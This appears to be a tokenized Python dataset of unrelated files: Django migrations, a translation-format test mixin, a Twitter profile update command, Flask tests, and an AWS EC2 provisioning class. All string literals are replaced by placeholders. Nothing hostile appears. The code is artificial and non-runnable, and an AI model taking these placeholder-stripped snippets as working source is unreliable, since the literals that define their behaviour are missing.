<s> from __future__ import unicode_literals <EOL> from django . db import migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterModelOptions ( <EOL> name = '<STR_LIT>' , <EOL> options = { '<STR_LIT>' : [ '<STR_LIT:name>' , '<STR_LIT:code>' ] } , <EOL> ) , <EOL> migrations . RenameField ( <EOL> model_name = '<STR_LIT>' , <EOL> old_name = '<STR_LIT>' , <EOL> new_name = '<STR_LIT>' , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( max_length = <NUM_LIT> , verbose_name = b'<STR_LIT>' , blank = True ) , <EOL> ) , <EOL> ] </s>
<s> import sys <EOL> from . base import * <EOL> try : <EOL> from . local import * <EOL> except ImportError , exc : <EOL> pass <EOL> TEST = len ( sys . argv ) > <NUM_LIT:1> and sys . argv [ <NUM_LIT:1> ] == '<STR_LIT:test>' <EOL> if TEST : <EOL> try : <EOL> from . test import * <EOL> except ImportError : <EOL> pass </s>
<s> from django_nose . tools import assert_equal <EOL> from pontoon . base . tests import ( <EOL> assert_attributes_equal , <EOL> create_tempfile , <EOL> LocaleFactory , <EOL> ) <EOL> from pontoon . base . utils import match_attr <EOL> class FormatTestsMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> maxDiff = None <EOL> parse = None <EOL> supports_keys = False <EOL> supports_source = False <EOL> supports_source_string = False <EOL> def setUp ( self ) : <EOL> super ( FormatTestsMixin , self ) . setUp ( ) <EOL> self . locale = LocaleFactory . create ( <EOL> code = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> plural_rule = '<STR_LIT>' , <EOL> cldr_plurals = '<STR_LIT>' , <EOL> ) <EOL> def parse_string ( self , string , source_string = None , locale = None ) : <EOL> path = create_tempfile ( string ) <EOL> locale = locale or self . locale <EOL> if source_string is not None : <EOL> source_path = create_tempfile ( source_string ) <EOL> return path , self . parse ( path , source_path = source_path , locale = locale ) <EOL> else : <EOL> return path , self . parse ( path , locale = locale ) <EOL> def key ( self , source_string ) : <EOL> """<STR_LIT>""" <EOL> return source_string if not self . supports_keys else source_string + '<STR_LIT>' <EOL> def run_parse_basic ( self , input_string , translation_index ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ '<STR_LIT>' ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { None : '<STR_LIT>' } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source : <EOL> assert_equal ( resource . translations [ translation_index ] . source , [ ( '<STR_LIT>' , '<STR_LIT:1>' ) ] ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' <EOL> ) <EOL> def run_parse_multiple_comments ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { None : '<STR_LIT>' } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' <EOL> ) <EOL> def run_parse_multiple_sources ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ( '<STR_LIT>' , '<STR_LIT:2>' ) , ( '<STR_LIT>' , '<STR_LIT:3>' ) ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { None : '<STR_LIT>' } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' <EOL> ) <EOL> def run_parse_fuzzy ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { None : '<STR_LIT>' } , <EOL> fuzzy = True , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' <EOL> ) <EOL> def run_parse_no_comments_no_sources ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { None : '<STR_LIT>' } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' <EOL> ) <EOL> def run_parse_missing_traslation ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' <EOL> ) <EOL> def run_parse_plural_translation ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { <EOL> <NUM_LIT:0> : '<STR_LIT>' , <EOL> <NUM_LIT:1> : '<STR_LIT>' <EOL> } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' , <EOL> ) <EOL> def run_parse_plural_translation_missing ( self , input_string , translation_index ) : <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { <EOL> <NUM_LIT:1> : '<STR_LIT>' <EOL> } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> source_string_plural = '<STR_LIT>' , <EOL> ) <EOL> def run_parse_empty_translation ( self , input_string , translation_index ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string ) <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> comments = [ ] , <EOL> source = [ ] , <EOL> key = self . key ( '<STR_LIT>' ) , <EOL> strings = { None : u'<STR_LIT>' } , <EOL> fuzzy = False , <EOL> order = translation_index , <EOL> ) <EOL> if self . supports_source_string : <EOL> assert_attributes_equal ( <EOL> resource . translations [ translation_index ] , <EOL> source_string = '<STR_LIT>' , <EOL> ) <EOL> def assert_file_content ( self , file_path , expected_content , strip = True ) : <EOL> with open ( file_path ) as f : <EOL> actual_content = f . read ( ) <EOL> if strip : <EOL> actual_content = actual_content . strip ( ) <EOL> expected_content = expected_content . strip ( ) <EOL> self . assertMultiLineEqual ( actual_content , expected_content ) <EOL> def run_save_basic ( self , input_string , expected_string , source_string = None , resource_cb = None ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> def test_default ( res ) : <EOL> translation = res . translations [ <NUM_LIT:0> ] <EOL> translation . strings [ None ] = '<STR_LIT>' <EOL> translation . fuzzy = True <EOL> ( resource_cb or test_default ) ( resource ) <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_remove ( self , input_string , expected_string , source_string = None , remove_cb = None ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> def default_remove ( res ) : <EOL> translation = res . translations [ <NUM_LIT:0> ] <EOL> translation . strings = { } <EOL> ( remove_cb or default_remove ) ( resource ) <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_plural ( self , input_string , expected_string , source_string = None ) : <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> translation = resource . translations [ <NUM_LIT:0> ] <EOL> translation . strings [ <NUM_LIT:0> ] = '<STR_LIT>' <EOL> translation . strings [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_plural_remove ( self , input_string , expected_string , source_string = None ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> translation = resource . translations [ <NUM_LIT:0> ] <EOL> translation . strings [ <NUM_LIT:0> ] = '<STR_LIT>' <EOL> del translation . strings [ <NUM_LIT:1> ] <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_remove_fuzzy ( self , input_string , expected_string , source_string = None ) : <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> resource . translations [ <NUM_LIT:0> ] . fuzzy = False <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_translation_missing ( self , source_string , input_string , expected_string ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> missing_translation = match_attr ( resource . translations , key = '<STR_LIT>' ) <EOL> missing_translation . strings = { None : '<STR_LIT>' } <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_translation_identical ( self , source_string , input_string , expected_string ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> translation = match_attr ( resource . translations , key = '<STR_LIT>' ) <EOL> translation . strings = { None : '<STR_LIT>' } <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) <EOL> def run_save_no_changes ( self , input_string , expected_string , source_string = None ) : <EOL> """<STR_LIT>""" <EOL> path , resource = self . parse_string ( input_string , source_string = source_string ) <EOL> resource . save ( self . locale ) <EOL> self . assert_file_content ( path , expected_string ) </s>
<s> from puente . utils import generate_keywords <EOL> TEXT_DOMAIN = '<STR_LIT>' <EOL> KEYWORDS = generate_keywords ( ) <EOL> COMMENT_TAGS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> DOMAIN_METHODS = None <EOL> BASE_DIR = None <EOL> JINJA2_CONFIG = None <EOL> PROJECT = '<STR_LIT>' <EOL> VERSION = '<STR_LIT:1.0>' <EOL> MSGID_BUGS_ADDRESS = '<STR_LIT>' <EOL> def get_setting ( key ) : <EOL> from django . conf import settings <EOL> return settings . PUENTE . get ( key , globals ( ) [ key ] ) </s>
<s> from django . conf import settings <EOL> from django . core . exceptions import PermissionDenied <EOL> from django . core . paginator import Paginator , InvalidPage <EOL> from django . http import Http404 , HttpResponse <EOL> from django . utils import simplejson <EOL> def paginate ( request , queryset , results_per_page = <NUM_LIT:20> ) : <EOL> paginator = Paginator ( queryset , results_per_page ) <EOL> try : <EOL> page = paginator . page ( int ( request . GET . get ( '<STR_LIT>' , <NUM_LIT:1> ) ) ) <EOL> except InvalidPage : <EOL> raise Http404 ( "<STR_LIT>" ) <EOL> except ValueError : <EOL> raise PermissionDenied ( ) <EOL> return page , paginator <EOL> def render_json_to_response ( context ) : <EOL> '''<STR_LIT>''' <EOL> result = simplejson . dumps ( context , sort_keys = False , indent = <NUM_LIT:4> ) <EOL> return HttpResponse ( result , mimetype = '<STR_LIT>' ) </s>
<s> '''<STR_LIT>''' <EOL> from datetime import datetime <EOL> import json <EOL> import logging <EOL> import oauth2 as oauth <EOL> from time import sleep <EOL> from django . conf import settings <EOL> from django . core . management . base import BaseCommand <EOL> from source . people . models import Person <EOL> SLEEP_SECONDS = <NUM_LIT:6> <EOL> CONSUMER_KEY = settings . TWITTER_CONSUMER_KEY <EOL> CONSUMER_SECRET = settings . TWITTER_CONSUMER_SECRET <EOL> ACCESS_KEY = settings . TWITTER_ACCESS_TOKEN <EOL> ACCESS_SECRET = settings . TWITTER_ACCESS_TOKEN_SECRET <EOL> logging . basicConfig ( filename = '<STR_LIT>' , filemode = '<STR_LIT:w>' , level = logging . INFO ) <EOL> def chunks ( object_list , chunk_size = <NUM_LIT:100> ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( object_list ) , chunk_size ) : <EOL> yield object_list [ i : i + chunk_size ] <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** options ) : <EOL> logging . info ( '<STR_LIT>' % datetime . now ( ) ) <EOL> person_queryset = Person . objects . exclude ( twitter_username = '<STR_LIT>' ) . values_list ( '<STR_LIT>' ) <EOL> person_list = list ( sum ( person_queryset , ( ) ) ) <EOL> person_list_sets = list ( chunks ( person_list ) ) <EOL> consumer = oauth . Consumer ( key = CONSUMER_KEY , secret = CONSUMER_SECRET ) <EOL> access_token = oauth . Token ( key = ACCESS_KEY , secret = ACCESS_SECRET ) <EOL> client = oauth . Client ( consumer , access_token ) <EOL> api_endpoint = '<STR_LIT>' <EOL> for person_set in person_list_sets : <EOL> querystring = '<STR_LIT>' % '<STR_LIT:U+002C>' . join ( person_set ) <EOL> response , data = client . request ( '<STR_LIT>' % ( api_endpoint , querystring ) ) <EOL> users = json . loads ( data ) <EOL> for user in users : <EOL> try : <EOL> twitter_username = user [ '<STR_LIT>' ] <EOL> twitter_avatar = user [ '<STR_LIT>' ] <EOL> twitter_bio = user [ '<STR_LIT:description>' ] or '<STR_LIT>' <EOL> Person . objects . filter ( twitter_username__iexact = twitter_username ) . update ( <EOL> twitter_bio = twitter_bio , <EOL> twitter_profile_image_url = twitter_avatar <EOL> ) <EOL> logging . info ( '<STR_LIT>' % twitter_username ) <EOL> except : <EOL> logging . info ( '<STR_LIT>' % user [ '<STR_LIT>' ] ) <EOL> pass <EOL> sleep ( SLEEP_SECONDS ) <EOL> logging . info ( '<STR_LIT>' % datetime . now ( ) ) </s>
<s> from flask import Blueprint , render_template <EOL> blueprint = Blueprint ( '<STR_LIT>' , __name__ ) <EOL> @ blueprint . route ( '<STR_LIT>' ) <EOL> def help ( ) : <EOL> """<STR_LIT>""" <EOL> return render_template ( '<STR_LIT>' ) </s>
<s> from flask import Flask <EOL> from nose . tools import eq_ <EOL> from standup . filters import format_update , gravatar_url , TAG_TMPL <EOL> from standup . tests import BaseTestCase <EOL> class FilterTestCase ( BaseTestCase ) : <EOL> def test_tags ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . app . app_context ( ) : <EOL> for tag in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> expected = '<STR_LIT>' % ( <EOL> tag , TAG_TMPL . format ( '<STR_LIT>' , tag [ <NUM_LIT:1> : ] . lower ( ) , tag [ <NUM_LIT:1> : ] ) ) <EOL> eq_ ( format_update ( tag ) , expected ) <EOL> for tag in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> eq_ ( format_update ( tag ) , tag ) <EOL> def test_gravatar_url ( self ) : <EOL> """<STR_LIT>""" <EOL> app = Flask ( __name__ ) <EOL> with app . test_request_context ( '<STR_LIT:/>' ) : <EOL> app . debug = True <EOL> url = gravatar_url ( '<STR_LIT>' ) <EOL> eq_ ( url , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> url = gravatar_url ( '<STR_LIT>' , <NUM_LIT:200> ) <EOL> eq_ ( url , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> app . debug = False <EOL> url = gravatar_url ( '<STR_LIT>' ) <EOL> eq_ ( url , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> app . config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> url = gravatar_url ( '<STR_LIT>' ) <EOL> eq_ ( url , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) </s>
<s> TEMPLATE_BUILTIN_FUNC_WHITELIST = ( <EOL> '<STR_LIT:all>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:list>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:float>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:type>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:str>' , <EOL> '<STR_LIT:int>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:bool>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:object>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> HTTP_STATUS_CODES = { <EOL> <NUM_LIT:100> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT:200> : '<STR_LIT:OK>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' <EOL> } <EOL> CONFIGURE = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT:/>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> NOTFOUND_HTML = b"""<STR_LIT>""" </s>
<s> </s>
<s> import boto <EOL> import boto . ec2 <EOL> import boto . ec2 . blockdevicemapping <EOL> import socket <EOL> import time <EOL> from strider . common . instance_data import InstanceData , SshData <EOL> import strider . common . logger <EOL> class EC2 ( object ) : <EOL> def __init__ ( self , name = None , region = None , access_key_id = None , <EOL> secret_access_key = None , security_token = None , image_id = None , <EOL> instance_type = None , key_name = None , security_groups = None , subnet_id = None , <EOL> ssh = None , user_data = None , tags = None , instance_profile_name = None , <EOL> block_device_map = None , bake_name = None , bake_description = None , <EOL> profile_name = None ) : <EOL> self . name = name <EOL> self . region = region <EOL> self . access_key_id = access_key_id <EOL> self . region = region <EOL> self . secret_access_key = secret_access_key <EOL> self . security_token = security_token <EOL> self . image_id = image_id <EOL> self . instance_type = instance_type <EOL> self . key_name = key_name <EOL> self . security_groups = security_groups <EOL> self . subnet_id = subnet_id <EOL> self . ssh = ssh <EOL> self . user_data = user_data <EOL> self . tags = tags <EOL> self . instance_profile_name = instance_profile_name <EOL> self . block_device_map = block_device_map <EOL> self . bake_name = bake_name <EOL> self . bake_description = bake_description <EOL> self . profile_name = profile_name <EOL> self . log = strider . utils . logger . get_logger ( '<STR_LIT>' ) <EOL> if not self . name : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if not self . instance_type : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if self . tags and type ( self . tags ) != dict : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if type ( self . ssh ) != dict : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if not self . security_groups : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . tags [ '<STR_LIT:Name>' ] = self . name <EOL> self . block_device_map = self . _transform_block_device_map ( ) <EOL> self . connection = self . _connect ( ) <EOL> def exists ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . describe ( ) . present <EOL> def describe ( self ) : <EOL> """<STR_LIT>""" <EOL> details = self . _details ( ) <EOL> if details is None : <EOL> return InstanceData ( present = False ) <EOL> else : <EOL> username = self . ssh [ '<STR_LIT:username>' ] <EOL> private_key_path = self . ssh [ '<STR_LIT>' ] <EOL> public_ip = self . ssh . get ( '<STR_LIT>' , True ) <EOL> port = self . ssh . get ( '<STR_LIT:port>' , <NUM_LIT> ) <EOL> host = details . ip_address <EOL> if not public_ip : <EOL> host = details . private_ip_address <EOL> ssh_data = SshData ( keyfile = private_key_path , user = username , host = host , port = port ) <EOL> return InstanceData ( present = True , provider_specific = details , ssh = ssh_data ) <EOL> def bake ( self ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" ) <EOL> instance_id = self . describe ( ) . provider_specific . id <EOL> ami_id = self . connection . create_image ( instance_id , self . bake_name , <EOL> self . bake_description , no_reboot = True , <EOL> block_device_mapping = self . block_device_map ) <EOL> self . log ( "<STR_LIT>" % ami_id ) <EOL> return ami_id <EOL> def up ( self ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" ) <EOL> me = self . describe ( ) . provider_specific <EOL> if me is None : <EOL> self . log ( "<STR_LIT>" ) <EOL> reservation = self . connection . run_instances ( <EOL> image_id = self . image_id , min_count = <NUM_LIT:1> , max_count = <NUM_LIT:1> , <EOL> key_name = self . key_name , user_data = self . user_data , <EOL> addressing_type = None , subnet_id = self . subnet_id , <EOL> instance_type = self . instance_type , <EOL> instance_profile_name = self . instance_profile_name , <EOL> security_group_ids = self . security_groups , <EOL> block_device_map = self . block_device_map <EOL> ) <EOL> self . log ( "<STR_LIT>" ) <EOL> self . _tag_instances ( reservation ) <EOL> self . _start_instances ( reservation ) <EOL> else : <EOL> self . log ( "<STR_LIT>" ) <EOL> self . connection . start_instances ( [ me . id ] ) <EOL> me = self . describe ( ) <EOL> if not me . present : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def destroy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" ) <EOL> me = self . describe ( ) <EOL> if me . present : <EOL> self . log ( "<STR_LIT>" ) <EOL> self . connection . terminate_instances ( instance_ids = [ me . provider_specific . id ] ) <EOL> self . log ( "<STR_LIT>" ) <EOL> else : <EOL> self . log ( "<STR_LIT>" ) <EOL> def _connect ( self ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" ) <EOL> conn = boto . ec2 . connect_to_region ( <EOL> self . region , <EOL> aws_access_key_id = self . access_key_id , <EOL> aws_secret_access_key = self . secret_access_key , <EOL> security_token = self . security_token , <EOL> profile_name = self . profile_name <EOL> ) <EOL> self . log ( "<STR_LIT>" ) <EOL> return conn <EOL> def _details ( self ) : <EOL> """<STR_LIT>""" <EOL> reservations = self . connection . get_all_instances ( <EOL> instance_ids = None , filters = None , dry_run = False , max_results = None ) <EOL> for reservation in reservations : <EOL> for instance in reservation . instances : <EOL> if "<STR_LIT:Name>" in instance . tags and instance . tags [ "<STR_LIT:Name>" ] == self . name : <EOL> if instance . state not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return instance <EOL> return None <EOL> def _start_instances ( self , reservation ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" ) <EOL> instance_ids = [ x . id for x in reservation . instances ] <EOL> self . connection . start_instances ( instance_ids , dry_run = False ) <EOL> self . log ( "<STR_LIT>" % instance_ids ) <EOL> while True : <EOL> time . sleep ( <NUM_LIT:10> ) <EOL> reservations = self . connection . get_all_instances ( instance_ids = instance_ids ) <EOL> for reservation in reservations : <EOL> for instance in reservation . instances : <EOL> if instance . state == '<STR_LIT>' : <EOL> self . log ( "<STR_LIT>" ) <EOL> return <EOL> def _transform_block_device_map ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . block_device_map is None : <EOL> return None <EOL> bdm = boto . ec2 . blockdevicemapping . BlockDeviceMapping ( ) <EOL> for ( k , v ) in self . block_device_map . iteritems ( ) : <EOL> bdm [ k ] = boto . ec2 . blockdevicemapping . EBSBlockDeviceType ( ) <EOL> bdm [ k ] . size = v [ '<STR_LIT:size>' ] <EOL> for prop in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:size>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if prop in v : <EOL> self . log ( "<STR_LIT>" % ( prop , v [ prop ] ) ) <EOL> setattr ( bdm [ k ] , prop , v [ prop ] ) <EOL> return bdm <EOL> def _tag_instances ( self , reservation ) : <EOL> """<STR_LIT>""" <EOL> self . log ( "<STR_LIT>" % self . tags ) <EOL> for instance in reservation . instances : <EOL> self . connection . create_tags ( [ instance . id ] , self . tags ) <EOL> self . log ( "<STR_LIT>" ) </s>
